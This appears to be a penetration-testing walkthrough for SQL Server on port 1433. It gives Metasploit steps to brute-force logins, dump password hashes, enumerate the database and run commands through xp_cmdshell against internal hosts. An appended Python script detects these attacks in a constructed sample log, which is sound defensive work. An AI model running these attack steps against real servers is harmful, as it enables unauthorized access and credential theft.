1. Collect the servers in the internal network that have port 1433 open:
This step can follow the article at https://www.cnblogs.com/xiehong/p/12502100.html
2. Start penetration testing against the servers with port 1433 open:
2.1 Brute-force port 1433 with msf: 192.168.10.251
(1)use auxiliary/scanner/mssql/mssql_login
(2)set RHOSTS 192.168.109.139
(3)set USER_FILE /home/xh/shentou/usr_mysql.txt
(4)set PASS_FILE /home/xh/shentou/pwd_mysql.txt
(5)run
2.2 Find/capture the server's credentials
(1)use auxiliary/scanner/mssql/mssql_hashdump
(2)set RHOSTS 192.168.10.251
(3)set PASSWORD 123456
(4)run
2.3 Browse MSSQL
(1)use auxiliary/admin/mssql/mssql_enum
(2)set RHOSTS 192.168.10.236
(3)set PASSWORD 123456
(4)run
2.4 Reload the xp_cmd feature
(1)use auxiliary/admin/mssql/mssql_exec
(2)set CMD 'ipconfig'
(3)set RHOSTS 192.168.10.251
(4)set PASSWORD 123456
(5)run
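A defender-side counterpart to steps 2.1 and 2.4, added here as an example and not part of the original post: the password guessing in 2.1 leaves a burst of error 18456 / "Login failed for user" entries in the SQL Server ERRORLOG, each tagged with the client address, and switching on xp_cmdshell as in 2.4 writes a "Configuration option 'xp_cmdshell' changed from 0 to 1" line. The script parses such lines, flags any client that exceeds a failure threshold inside a sliding window, and lists the moments xp_cmdshell was enabled. The log excerpt, client addresses and thresholds are constructed for the demonstration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample ERRORLOG excerpt (not captured from any real server):
# a burst of failed 'sa' logons from one client, a single stray failure from
# another client, and a later sp_configure change that turns on xp_cmdshell.
SAMPLE_ERRORLOG = """\
2024-03-01 10:00:01.10 Logon       Error: 18456, Severity: 14, State: 8.
2024-03-01 10:00:01.10 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.10.50]
2024-03-01 10:00:01.42 Logon       Error: 18456, Severity: 14, State: 8.
2024-03-01 10:00:01.42 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.10.50]
2024-03-01 10:00:01.80 Logon       Error: 18456, Severity: 14, State: 8.
2024-03-01 10:00:01.80 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.10.50]
2024-03-01 10:00:02.15 Logon       Error: 18456, Severity: 14, State: 8.
2024-03-01 10:00:02.15 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.10.50]
2024-03-01 10:00:02.51 Logon       Error: 18456, Severity: 14, State: 8.
2024-03-01 10:00:02.51 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.10.50]
2024-03-01 10:00:02.90 Logon       Error: 18456, Severity: 14, State: 8.
2024-03-01 10:00:02.90 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.10.50]
2024-03-01 10:03:17.00 Logon       Error: 18456, Severity: 14, State: 8.
2024-03-01 10:03:17.00 Logon       Login failed for user 'reporting'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.10.7]
2024-03-01 10:05:00.00 spid55      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
"""

# ERRORLOG line layout: "<timestamp> <source> <message>"
LINE_RE = re.compile(r"^(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{2}) (\S+)\s+(.*)$")
FAILED_RE = re.compile(r"Login failed for user '([^']*)'.*\[CLIENT: ([^\]]+)\]")
XP_RE = re.compile(r"Configuration option 'xp_cmdshell' changed from 0 to 1")


def parse_errorlog(text):
    """Split ERRORLOG text into (timestamp, source, message) tuples."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # banner/continuation lines carry no timestamp
        ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S.%f")
        records.append((ts, m.group(2), m.group(3)))
    return records


def failed_logins(records):
    """Return (timestamp, login, client_ip) for every 'Login failed' message."""
    out = []
    for ts, _src, msg in records:
        m = FAILED_RE.search(msg)
        if m:
            out.append((ts, m.group(1), m.group(2)))
    return out


def bruteforce_sources(records, threshold=5, window=timedelta(seconds=60)):
    """Map client IP -> peak number of failed logons inside any `window`.
    Only clients reaching `threshold` are returned (threshold is an assumption)."""
    by_client = defaultdict(list)
    for ts, _login, ip in failed_logins(records):
        by_client[ip].append(ts)
    flagged = {}
    for ip, times in by_client.items():
        times.sort()
        peak, start = 0, 0
        for end in range(len(times)):  # sliding window over sorted timestamps
            while times[end] - times[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            flagged[ip] = peak
    return flagged


def xp_cmdshell_enabled_at(records):
    """Timestamps at which the log records xp_cmdshell being switched on."""
    return [ts for ts, _src, msg in records if XP_RE.search(msg)]


if __name__ == "__main__":
    recs = parse_errorlog(SAMPLE_ERRORLOG)
    for ip, n in bruteforce_sources(recs).items():
        print(f"possible password guessing from {ip}: {n} failures within 60s")
    for ts in xp_cmdshell_enabled_at(recs):
        print(f"xp_cmdshell enabled at {ts}")
```

Run against a real ERRORLOG the same way (`parse_errorlog(open(path).read())`); the "Error: 18456" line and the "Login failed" line are written as separate entries, so the client address is taken only from the latter, and a single xp_cmdshell enablement line is worth an alert on its own since it is rarely a routine change.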